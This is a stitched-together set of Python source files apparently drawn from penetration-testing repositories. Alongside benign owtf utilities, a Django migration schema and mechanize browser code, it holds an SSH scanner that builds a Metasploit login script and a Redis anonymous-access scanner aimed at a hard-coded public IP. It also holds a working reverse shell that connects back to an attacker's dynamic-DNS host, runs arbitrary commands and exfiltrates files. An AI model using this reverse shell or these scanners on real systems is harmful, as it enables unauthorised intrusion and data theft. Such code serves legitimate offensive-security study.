            'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
        },
        u'xtreme_server.inputfield': {
            'Meta': {'object_name': 'InputField'},
            'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
        },
        u'xtreme_server.learntmodel': {
            'Meta': {'object_name': 'LearntModel'},
            'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
            'query_id': ('django.db.models.fields.TextField', [], {})
        },
        u'xtreme_server.page': {
            'Meta': {'object_name': 'Page'},
            'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
            'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
            'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        u'xtreme_server.project': {
            'Meta': {'object_name': 'Project'},
            'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
            'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
            'auth_mode': ('django.db.models.fields.TextField', [], {}),
            'consider_only': ('django.db.models.fields.TextField', [], {}),
            'exclude_fields': ('django.db.models.fields.TextField', [], {}),
            'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'password': ('django.db.models.fields.TextField', [], {}),
            'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
            'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
            'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
            'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
            'username': ('django.db.models.fields.TextField', [], {}),
            'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
        },
        u'xtreme_server.settings': {
            'Meta': {'object_name': 'Settings'},
            'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
            'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
            'auth_mode': ('django.db.models.fields.TextField', [], {}),
            'consider_only': ('django.db.models.fields.TextField', [], {}),
            'exclude_fields': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'password': ('django.db.models.fields.TextField', [], {}),
            'username': ('django.db.models.fields.TextField', [], {})
        },
        u'xtreme_server.vulnerability': {
            'Meta': {'object_name': 'Vulnerability'},
            'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        }
    }
    complete_apps = ['xtreme_server']
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: ssh_login.py
Purpose: To scan a network for a ssh port and automatically generate a resource file for Metasploit.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
# Verify third-party dependencies are installed, with install hints.
# NOTE(review): the bare "except:" also hides unrelated import errors
# inside the libraries themselves.
try:
    import nmap
except:
    sys.exit("[!] Install the nmap library: pip install python-nmap")
try:
    import netifaces
except:
    sys.exit("[!] Install the netifaces library: pip install netifaces")
# Argument Validator
if len(sys.argv) != 5:
    sys.exit("[!] Please provide four arguments the first being the targets the second the ports, the third the username, and the fourth the password")
# Positional CLI arguments: targets, port, username, password.
password = str(sys.argv[4])
username = str(sys.argv[3])
ports = str(sys.argv[2])
hosts = str(sys.argv[1])
# Output directory for the hosts file and Metasploit resource script.
home_dir="/root"
gateways = {}
network_ifaces={}
def get_interfaces():
    """Return the list of local network interface names."""
    return netifaces.interfaces()
def get_gateways():
    """Map each gateway family reported by netifaces to [gateway_ip, iface].

    Entries whose value does not have the expected AF_INET layout are
    skipped (best effort, as before).

    :return: dict of {family_or_'default': [gateway_ip, interface_name]}
    """
    gateway_dict = {}
    gws = netifaces.gateways()
    for gw in gws:
        try:
            gateway_iface = gws[gw][netifaces.AF_INET]
            gateway_ip, iface = gateway_iface[0], gateway_iface[1]
            gw_list =[gateway_ip, iface]
            gateway_dict[gw]=gw_list
        except Exception:
            # Fix: narrowed from a bare "except:" so KeyboardInterrupt and
            # SystemExit are no longer silently swallowed.
            pass
    return gateway_dict
def get_addresses(interface):
    """Return (hwaddr, ip_addr, broadcast, netmask) for *interface*.

    Only the first AF_LINK and AF_INET address entries are consulted;
    missing fields come back as None via dict.get().
    """
    all_addrs = netifaces.ifaddresses(interface)
    link_info = all_addrs[netifaces.AF_LINK][0]
    inet_info = all_addrs[netifaces.AF_INET][0]
    return (
        link_info.get('addr'),
        inet_info.get('addr'),
        inet_info.get('broadcast'),
        inet_info.get('netmask'),
    )
def get_networks(gateways_dict):
    """Build {interface: details} for every gateway in *gateways_dict*.

    Fixes over the original: iterates the *gateways_dict* parameter instead
    of the module-level `gateways` global, and stores the broadcast address
    under 'broadcast' (the old key had a stray leading space: ' broadcast';
    no caller in this file read it).

    :param gateways_dict: output of get_gateways()
    :return: dict of {iface: {'gateway', 'hwaddr', 'addr', 'broadcast', 'netmask'}}
    """
    networks_dict = {}
    for key, value in gateways_dict.iteritems():
        gateway_ip, iface = value[0], value[1]
        hwaddress, addr, broadcast, netmask = get_addresses(iface)
        network = {'gateway': gateway_ip, 'hwaddr': hwaddress, 'addr': addr, 'broadcast': broadcast, 'netmask': netmask}
        networks_dict[iface] = network
    return networks_dict
def target_identifier(dir, user, passwd, ips, port_num, ifaces):
    """Nmap-scan *ips* on *port_num* and record hosts with an open SSH service.

    Hosts that belong to one of the local interfaces in *ifaces* are skipped.
    Matching hosts are written one per line to <dir>/ssh_hosts.

    Fixes over the original: the output file is opened once ('w' truncates,
    replacing the separate truncate-then-append dance) and is always closed
    (previously a new unbuffered handle was opened for every candidate host
    and `e.closed` -- a no-op attribute access -- never closed anything);
    the dead hard-coded /root re-assignment inside the loop is gone.

    :return: path of the generated hosts file
    """
    ssh_hosts = "%s/ssh_hosts" % (dir)
    scanner = nmap.PortScanner()
    scanner.scan(ips, port_num)
    if not scanner.all_hosts():
        sys.exit("[!] No viable targets were found!")
    bufsize = 0
    e = open(ssh_hosts, 'w', bufsize)
    try:
        for host in scanner.all_hosts():
            # Never target our own interfaces.
            for k, v in ifaces.iteritems():
                if v['addr'] == host:
                    print("[-] Removing %s from target list since it belongs to your interface!" % (host))
                    host = None
            if host is not None:
                if 'ssh' in scanner[host]['tcp'][int(port_num)]['name']:
                    if 'open' in scanner[host]['tcp'][int(port_num)]['state']:
                        print("[+] Adding host %s to %s since the service is active on %s" % (host, ssh_hosts, port_num))
                        e.write(host + "\n")
    finally:
        e.close()
    return ssh_hosts
def resource_file_builder(dir, user, passwd, ips, port_num, hosts_file):
    """Write a Metasploit resource script <dir>/ssh_login.rc for ssh_login.

    Fixes over the original: uses the *user*/*passwd*/*port_num* parameters
    instead of reaching for the module-level globals; actually writes the
    "set rport" line it builds (it was constructed but never written, and
    was missing both the space after "rport" and a trailing newline); and
    closes the file handle (``f.closed`` was a no-op attribute access).

    :param dir: directory the .rc file is written into
    :param user: SSH username for the scanner module
    :param passwd: SSH password for the scanner module
    :param ips: unused, kept for interface compatibility
    :param port_num: target port as a string
    :param hosts_file: path to the file listing target hosts
    """
    ssh_login_rc = "%s/ssh_login.rc" % (dir)
    lines = [
        "use auxiliary/scanner/ssh/ssh_login \n",
        "set username " + user + "\n",
        "set password " + passwd + "\n",
        "set rhosts file:" + hosts_file + "\n",
        "set rport " + port_num + "\n",
        "run\n",
    ]
    f = open(ssh_login_rc, 'w')
    try:
        f.writelines(lines)
    finally:
        f.close()
if __name__ == '__main__':
    # Pipeline: discover local gateways/interfaces, scan for SSH targets
    # (excluding our own addresses), then emit the Metasploit .rc script.
    gateways = get_gateways()
    network_ifaces = get_networks(gateways)
    hosts_file = target_identifier(home_dir,username,password,hosts,ports,network_ifaces)
    resource_file_builder(home_dir, username, password, hosts, ports, hosts_file)
owtf | """
owtf.db.session
~~~~~~~~~~~~~~~
This file handles all the database transactions.
"""
import functools
import sys
import logging
from sqlalchemy import create_engine, exc, func
from sqlalchemy.orm import Session as _Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import NullPool
from owtf.db.model_base import Model
from owtf.settings import DATABASE_IP, DATABASE_NAME, DATABASE_PASS, DATABASE_USER, DATABASE_PORT
DB_URI = "postgresql+psycopg2://{}:{}@{}:{}/{}".format(
DATABASE_USER, DATABASE_PASS, DATABASE_IP, DATABASE_PORT, DATABASE_NAME
)
def get_count(q):
    """Return the number of rows query *q* would yield via a COUNT(*)."""
    count_stmt = q.statement.with_only_columns([func.count()]).order_by(None)
    return q.session.execute(count_stmt).scalar()
def flush_transaction(method):
    """Decorator: flush ``self.session`` after *method* succeeds.

    A ``dryrun=True`` keyword argument (consumed, not forwarded) rolls the
    session back instead of flushing.  Any exception is logged, triggers a
    rollback, and is re-raised.
    """

    @functools.wraps(method)
    def wrapper(self, *args, **kwargs):
        dryrun = kwargs.pop("dryrun", False)
        try:
            result = method(self, *args, **kwargs)
            if dryrun:
                self.session.rollback()
            else:
                self.session.flush()
        except Exception:
            logging.exception("Transaction Failed. Rolling back.")
            if self.session is not None:
                self.session.rollback()
            raise
        return result

    return wrapper
def get_db_engine():
    """Create the SQLAlchemy engine (no connection pooling) and ensure tables exist.

    Exits the process with status 1 if the database is unreachable.
    """
    try:
        engine = create_engine(DB_URI, poolclass=NullPool)
        # Create any missing tables declared on the shared Model metadata.
        Model.metadata.create_all(engine)
        return engine
    except exc.OperationalError as e:
        logging.error("Could not create engine - Exception occured\n%s", str(e))
        sys.exit(1)
def get_scoped_session():
    """Bind the module session factory to a fresh engine and return a new session."""
    Session.configure(bind=get_db_engine())
    return Session()
class Session(_Session):
    """ Custom session meant to utilize add on the model.

    This Session keeps private aliases of SQLAlchemy's add/add_all/delete so
    that the public methods can be discouraged in favour of the add methods
    on the models themselves, where overriding is available.
    """

    # Private aliases to the SQLAlchemy originals for internal use.
    _add = _Session.add
    _add_all = _Session.add_all
    _delete = _Session.delete
# Module-level factory producing instances of the custom Session above.
Session = sessionmaker(class_=Session)
| 25.923077 | 97 | 0.650786 |
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read no-ip.com terms and conditions carefully.
Use it on your own risk.
'''
# Python For Offensive PenTest
# DDNS Aware Shell
import socket
import subprocess
import os
def transfer(s,path):
    """Stream the file at *path* to socket *s* in 1 KiB chunks (Python 2).

    Sends the literal marker 'DONE' after the last chunk; sends an error
    string instead if the path does not exist.  NOTE(review): a file whose
    content contains 'DONE' would confuse the receiver -- protocol quirk.
    """
    if os.path.exists(path):
        f = open(path, 'rb')
        packet = f.read(1024)
        while packet != '':
            s.send(packet)
            packet = f.read(1024)
        # End-of-file marker understood by the remote operator.
        s.send('DONE')
        f.close()
    else:
        s.send('Unable to find out the file')
def connect(ip):
    """Reverse-shell client loop: connect to *ip*:8080 and execute commands.

    Protocol (Python 2): 'terminate' closes the session, 'grab*<path>'
    exfiltrates a file via transfer(), anything else is run through the
    shell with stdout/stderr sent back.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 8080)) # instead of hardcoding the ip addr statically we pass our ip variable
    while True:
        command = s.recv(1024)
        if 'terminate' in command:
            s.close()
            break
        elif 'grab' in command:
            # Command format: "grab*<absolute path>".
            grab,path = command.split('*')
            try:
                transfer(s,path)
            except Exception,e:
                # Report the failure to the operator instead of dying.
                s.send ( str(e) )
                pass
        else:
            # Execute arbitrary shell command and return its output.
            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( CMD.stdout.read() )
            s.send( CMD.stderr.read() )
def main ():
    # Resolve the attacker's dynamic-DNS hostname to its current IP, then
    # connect back to it.
    ip = socket.gethostbyname('pythonhussam.ddns.net') # We will use the os to send out a dns query for pythonhussam.ddns.net
    print "Resolved IP was: " + ip  # Please don't forget to change this name to yours :D
    connect(ip) # we will pass the ip variable which contains the attacker ip to connect function
main()
| 23.239437 | 133 | 0.573837 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from threading import Thread
from printers import printPink,printGreen
from Queue import Queue
import redis
class redis_burp(object):
    """Worker-pool checker for Redis servers that allow anonymous access.

    Python 2 class: run() feeds ip:port pairs from ipdict['redis'] into a
    queue consumed by *threads* daemon workers; hits are printed and
    appended to a result file.
    """
    def __init__(self,c):
        # c: shared config object providing write_file().
        self.config=c
        # Guards the shared result list and console output.
        self.lock=threading.Lock()
        self.result=[]
        #self.lines=self.config.file2list("conf/redis.conf")
        self.sp=Queue()
    def redisexp(self):
        """Worker loop: pop (ip, port) and try an unauthenticated DBSIZE."""
        while True:
            ip,port=self.sp.get()
            try:
                # dbsize() succeeds only if no AUTH is required.
                r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
                r.dbsize()
                self.lock.acquire()
                printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
                self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
                self.lock.release()
            except Exception,e:
                # Connection refused / AUTH required: not anonymous, skip.
                pass
            self.sp.task_done()
    def run(self,ipdict,pinglist,threads,file):
        """Spawn workers, enqueue every ip:port target, and persist results."""
        if len(ipdict['redis']):
            printPink("crack redis now...")
            print "[*] start crack redis  %s" % time.ctime()
            starttime=time.time()
            for i in xrange(threads):
                t = Thread(target=self.redisexp)
                t.setDaemon(True)
                t.start()
            for ip in ipdict['redis']:
                self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
            # Block until every queued target has been processed.
            self.sp.join()
            print "[*] stop redis serice  %s" % time.ctime()
            print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
    # Ad-hoc smoke test against a single hard-coded target.
    import sys
    sys.path.append("../")
    from comm.config import *
    c=config()
    ipdict={'redis': ['101.201.177.35:6379']}
    pinglist=['101.201.177.35']
    test=redis_burp(c)
    test.run(ipdict,pinglist,50,file="../result/test")
| 28.925373 | 105 | 0.541916 |
owtf | """
owtf.utils.strings
~~~~~~~~~~~~~~~~~~
"""
import base64
import binascii
import logging
import os
import re
from collections import defaultdict
import six
from owtf.settings import REPLACEMENT_DELIMITER
search_regex = re.compile("{!s}([a-zA-Z0-9-_]*?){!s}".format(REPLACEMENT_DELIMITER, REPLACEMENT_DELIMITER))
def utf8(string):
    """Encode a text value as UTF-8 bytes; non-text values pass through unchanged."""
    if isinstance(string, six.string_types):
        string = string.encode("utf8")
    return string
def to_str(byte):
    """Decode UTF-8 bytes to str, ignoring bad sequences; str passes through."""
    return byte.decode("utf-8", "ignore") if isinstance(byte, bytes) else byte
def str2bool(string):
    """Converts a string to a boolean

    Everything is truthy except the literal false markers below.

    :param string: String to convert
    :type string: `str`
    :return: Boolean equivalent
    :rtype: `bool`
    """
    falsy_markers = ["False", "false", 0, "0"]
    return string not in falsy_markers
def multi_replace(text, replace_dict, simple_text=False):
    """Recursive multiple replacement function

    :param text: Text to replace
    :type text: `str`
    :param replace_dict: The parameter dict to be replaced with
    :type replace_dict: `dict`
    :param simple_text: When True, dict keys are replaced as literal substrings
                        instead of delimiter-wrapped placeholder names
    :type simple_text: `bool`
    :return: The modified text after replacement
    :rtype: `str`
    """
    result = text
    if simple_text:
        # Plain mode: every dict key is replaced verbatim, no recursion.
        for needle in replace_dict.keys():
            result = result.replace(needle, replace_dict[needle])
            result = os.path.expanduser(result)
        return result
    # Placeholder mode: find delimiter-wrapped names and expand recursively so
    # placeholders nested inside replacement values are resolved as well.
    for name in search_regex.findall(result):
        if replace_dict.get(name, None):
            token = REPLACEMENT_DELIMITER + name + REPLACEMENT_DELIMITER
            result = result.replace(token, multi_replace(replace_dict[name], replace_dict))
            result = os.path.expanduser(result)
    return result
def get_as_list(key_list):
    """Get values for keys in a list

    :param key_list: List of keys
    :type key_list: `list`
    :return: List of corresponding values
    :rtype: `list`
    """
    from owtf.config import config_handler

    # Look each key up in the global config, preserving input order.
    return [config_handler.get_val(key) for key in key_list]
def get_header_list(key):
    """Get list from a string of values for a key

    :param key: Key
    :type key: `str`
    :return: List of values
    :rtype: `list`
    """
    from owtf.config import config_handler

    # Header values are stored as one comma-separated string.
    raw_value = config_handler.get_val(key)
    return raw_value.split(",")
def pad_key(key):
    """Add delimiters.

    Wraps the bare name in replacement delimiters so it matches placeholder syntax.

    :param key: Key to pad
    :type key: `str`
    :return: Padded key string
    :rtype: `str`
    """
    return "{0}{1}{0}".format(REPLACEMENT_DELIMITER, key)
def strip_key(key):
    """Remove every replacement delimiter from the key.

    :param key: Key to clear
    :type key: `str`
    :return: Key without delimiters
    :rtype: `str`
    """
    return "".join(key.split(REPLACEMENT_DELIMITER))
def multi_replace_dict(text, replace_dict):
    """Perform multiple literal replacements in one pass over the dict.

    Dict format: { 'search' : 'replace' }; replacement values are coerced to str.

    :param text: Text to replace
    :type text: `str`
    :param replace_dict: The replacement strings in a dict
    :type replace_dict: `dict`
    :return: Text after all replacements
    :rtype: `str`
    """
    result = text
    for needle, replacement in list(replace_dict.items()):
        result = result.replace(needle, str(replacement))
    return result
def wipe_bad_chars(filename):
    """The function wipes bad characters from name of output file

    Parentheses are dropped; spaces and slashes become underscores.

    :param filename: The file name to scrub
    :type filename: `str`
    :return: New replaced file filename
    :rtype: `str`
    """
    bad_chars = {"(": "", " ": "_", ")": "", "/": "_"}
    return multi_replace(filename, bad_chars, True)
def remove_blanks_list(src):
    """Removes falsy elements (empty strings, None, 0, ...) from the list

    :param src: List
    :type src: `list`
    :return: New list without blanks
    :rtype: `list`
    """
    return list(filter(None, src))
def list_to_dict_keys(list):
    """Build a dict whose keys are the items of *list*, each mapped to "".

    Bug fix: the parameter shadows the builtin ``list``, so the original
    ``defaultdict(list)`` passed the *input sequence* as the default factory
    and raised ``TypeError: first argument must be callable or None`` on
    every call.  Since every key is explicitly assigned, a plain dict is
    returned instead (the parameter name is kept for backward compatibility).

    :param list: list to convert
    :type list: `list`
    :return: The newly formed dictionary
    :rtype: `dict`
    """
    return {item: "" for item in list}
def add_to_dict(from_dict, to_dict):
    """Add the items from dict a with copy attribute to dict b

    Values exposing a callable ``copy`` attribute (lists, dicts, sets, ...)
    are shallow-copied; everything else is assigned directly.

    :param from_dict: Dict to copy from
    :type from_dict: `dict`
    :param to_dict: Dict to copy to
    :type to_dict: `dict`
    :return: None
    :rtype: None
    """
    for key, value in list(from_dict.items()):
        copier = getattr(value, "copy", None)
        to_dict[key] = copier() if callable(copier) else value
def merge_dicts(a, b):
    """Returns a by-value copy contained the merged content of the 2 passed
    dictionaries; entries of b win over entries of a.

    :param a: Dict a
    :type a: `dict`
    :param b: Dict b
    :type b: `dict`
    :return: New merge dict
    :rtype: `dict`
    """
    merged = defaultdict(list)
    for source in (a, b):
        add_to_dict(source, merged)
    return merged
def truncate_lines(str, num_lines, eol="\n"):
    """Keep only the first *num_lines* lines of *str*.

    :param str: String to truncate
    :type str: `str`
    :param num_lines: Number of lines to keep
    :type num_lines: `int`
    :param eol: EOL char
    :type eol: `char`
    :return: Joined string after truncation (no trailing EOL)
    :rtype: `str`
    """
    kept = str.split(eol)[:num_lines]
    return eol.join(kept)
def get_random_str(len):
    """Function returns a URL-safe random byte string of length len

    :param len: Length
    :type len: `int`
    :return: Random generated string (bytes)
    :rtype: `bytes`
    """
    token = base64.urlsafe_b64encode(os.urandom(len))
    return token[0:len]
def gen_secure_random_str():
    """Return 64 hex characters (as bytes) from 32 cryptographically random bytes."""
    raw = os.urandom(32)
    return binascii.hexlify(raw)
def scrub_output(output):
    """Remove all ANSI control sequences from the output

    :param output: Output to scrub
    :type output: `str`
    :return: Scrubbed output
    :rtype: `str`
    """
    # ESC followed by anything up to (and including) the terminating 'm'.
    return re.sub(r"\x1b[^m]*m", "", output)
def paths_exist(path_list):
    """Check that every truthy path in the list exists on disk.

    Falsy entries (``None``, ``""``) are skipped rather than treated as
    missing paths.

    Bug fix: the original called ``logging.log("WARNING: ...", path)`` —
    ``logging.log`` requires a numeric level as its first argument, so every
    missing path raised ``TypeError`` instead of logging a warning.

    :param path_list: The list of paths to check
    :type path_list: `list`
    :return: True if all (truthy) paths exist, else False
    :rtype: `bool`
    """
    valid = True
    for path in path_list:
        if path and not os.path.exists(path):
            logging.warning("The path %s does not exist!", path)
            valid = False
    return valid
def is_convertable(value, conv):
    """Apply the converter to the value, returning None when it raises ValueError.

    :param value: Value to convert
    :param conv: Callable converter (e.g. ``int``, ``float``)
    :return: Converted value, or None on ValueError
    """
    try:
        result = conv(value)
    except ValueError:
        return None
    return result
def str_to_dict(string):
    """Convert an '='-separated string of alternating key/value tokens to a dict.

    e.g. ``"a=1=b=2"`` -> ``{"a": "1", "b": "2"}``; a trailing key with no
    value maps to ``""``.

    :param string: String to convert
    :type string: `str`
    :return: Resultant dict
    :rtype: `dict`
    """
    result = defaultdict(list)
    previous = ""
    for index, token in enumerate(string.strip().split("=")):
        if index % 2 == 0:  # even position: this token is a key
            result[token] = ""
            previous = token
        else:  # odd position: value for the preceding key
            result[previous] = token
    return result
| 23.125828 | 119 | 0.607275 |
PenetrationTestingScripts | """Stateful programmatic WWW navigation, after Perl's WWW::Mechanize.
Copyright 2003-2006 John J. Lee <jjl@pobox.com>
Copyright 2003 Andy Lester (original Perl code)
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file COPYING.txt
included with the distribution).
"""
import copy, re, os, urllib, urllib2
from _html import DefaultFactory
import _response
import _request
import _rfc3986
import _sockettimeout
import _urllib2_fork
from _useragent import UserAgentBase
# Raised when the Browser is in the wrong state for the requested operation
# (e.g. .back() on empty history, or form/link access on non-HTML content).
class BrowserStateError(Exception): pass
# Raised by find_link()/click_link() when no link matches the given criteria.
class LinkNotFoundError(Exception): pass
# Raised by select_form() when no form matches the given criteria.
class FormNotFoundError(Exception): pass
def sanepathname2url(path):
    """Convert a filesystem path to a URL path usable in a file: URL."""
    urlpath = urllib.pathname2url(path)
    if os.name == "nt" and urlpath.startswith("///"):
        # On Windows pathname2url yields '///C|/...'; drop the extra slashes.
        urlpath = urlpath[2:]
    # XXX don't ask me about the mac...
    return urlpath
class History:
    """LIFO stack of (request, response) pairs used for Browser navigation.

    Though this will become public, the implied interface is not yet stable.
    """
    def __init__(self):
        self._stack = []  # most recent entry last (LIFO)
    def add(self, request, response):
        self._stack.append((request, response))
    def back(self, n, _response):
        # XXX move Browser._response into this class?
        request, response = None, _response
        # Keep popping until n steps are consumed AND we hold a real response.
        while n > 0 or response is None:
            if not self._stack:
                raise BrowserStateError("already at start of history")
            request, response = self._stack.pop()
            n -= 1
        return request, response
    def clear(self):
        del self._stack[:]
    def close(self):
        # Close responses in insertion order, then empty the stack.
        for request, response in self._stack:
            if response is not None:
                response.close()
        del self._stack[:]
class HTTPRefererProcessor(_urllib2_fork.BaseHandler):
    """Handler that adds a Referer header to redirected HTTP(S) requests."""
    def http_request(self, request):
        # See RFC 2616 14.36. The only times we know the source of the
        # request URI has a URI associated with it are redirect, and
        # Browser.click() / Browser.submit() / Browser.follow_link().
        # Otherwise, it's the user's job to add any Referer header before
        # .open()ing.
        if hasattr(request, "redirect_dict"):
            request = self.parent._add_referer_header(
                request, origin_request=False)
        return request
    https_request = http_request
class Browser(UserAgentBase):
    """Browser-like class with support for history, forms and links.
    BrowserStateError is raised whenever the browser is in the wrong state to
    complete the requested operation - e.g., when .back() is called when the
    browser history is empty, or when .follow_link() is called when the current
    response does not contain HTML data.
    Public attributes:
    request: current request (mechanize.Request)
    form: currently selected form (see .select_form())
    """
    # Extend the UserAgentBase handler set with the Referer processor.
    handler_classes = copy.copy(UserAgentBase.handler_classes)
    handler_classes["_referer"] = HTTPRefererProcessor
    default_features = copy.copy(UserAgentBase.default_features)
    default_features.append("_referer")
    def __init__(self,
                 factory=None,
                 history=None,
                 request_class=None,
                 ):
        """
        Only named arguments should be passed to this constructor.
        factory: object implementing the mechanize.Factory interface.
        history: object implementing the mechanize.History interface. Note
        this interface is still experimental and may change in future.
        request_class: Request class to use. Defaults to mechanize.Request
        The Factory and History objects passed in are 'owned' by the Browser,
        so they should not be shared across Browsers. In particular,
        factory.set_response() should not be called except by the owning
        Browser itself.
        Note that the supplied factory's request_class is overridden by this
        constructor, to ensure only one Request class is used.
        """
        self._handle_referer = True
        if history is None:
            history = History()
        self._history = history
        if request_class is None:
            request_class = _request.Request
        if factory is None:
            factory = DefaultFactory()
        factory.set_request_class(request_class)
        self._factory = factory
        self.request_class = request_class
        self.request = None
        self._set_response(None, False)
        # do this last to avoid __getattr__ problems
        UserAgentBase.__init__(self)
    def close(self):
        """Release resources and disable further use of this Browser."""
        UserAgentBase.close(self)
        if self._response is not None:
            self._response.close()
        if self._history is not None:
            self._history.close()
            self._history = None
        # make use after .close easy to spot
        self.form = None
        self.request = self._response = None
        self.request = self.response = self.set_response = None
        self.geturl = self.reload = self.back = None
        self.clear_history = self.set_cookie = self.links = self.forms = None
        self.viewing_html = self.encoding = self.title = None
        self.select_form = self.click = self.submit = self.click_link = None
        self.follow_link = self.find_link = None
    def set_handle_referer(self, handle):
        """Set whether to add Referer header to each request."""
        self._set_handler("_referer", handle)
        self._handle_referer = bool(handle)
    def _add_referer_header(self, request, origin_request=True):
        """Attach a Referer header derived from the current request, when allowed."""
        if self.request is None:
            return request
        scheme = request.get_type()
        original_scheme = self.request.get_type()
        if scheme not in ["http", "https"]:
            return request
        if not origin_request and not self.request.has_header("Referer"):
            return request
        # Never leak an https referer to a non-https destination.
        if (self._handle_referer and
            original_scheme in ["http", "https"] and
            not (original_scheme == "https" and scheme != "https")):
            # strip URL fragment (RFC 2616 14.36)
            parts = _rfc3986.urlsplit(self.request.get_full_url())
            parts = parts[:-1]+(None,)
            referer = _rfc3986.urlunsplit(parts)
            request.add_unredirected_header("Referer", referer)
        return request
    def open_novisit(self, url, data=None,
                     timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        """Open a URL without visiting it.
        Browser state (including request, response, history, forms and links)
        is left unchanged by calling this function.
        The interface is the same as for .open().
        This is useful for things like fetching images.
        See also .retrieve().
        """
        return self._mech_open(url, data, visit=False, timeout=timeout)
    def open(self, url, data=None,
             timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        return self._mech_open(url, data, timeout=timeout)
    def _mech_open(self, url, data=None, update_history=True, visit=None,
                   timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
        # Core open implementation shared by open()/open_novisit()/reload().
        try:
            url.get_full_url
        except AttributeError:
            # string URL -- convert to absolute URL if required
            scheme, authority = _rfc3986.urlsplit(url)[:2]
            if scheme is None:
                # relative URL
                if self._response is None:
                    raise BrowserStateError(
                        "can't fetch relative reference: "
                        "not viewing any document")
                url = _rfc3986.urljoin(self._response.geturl(), url)
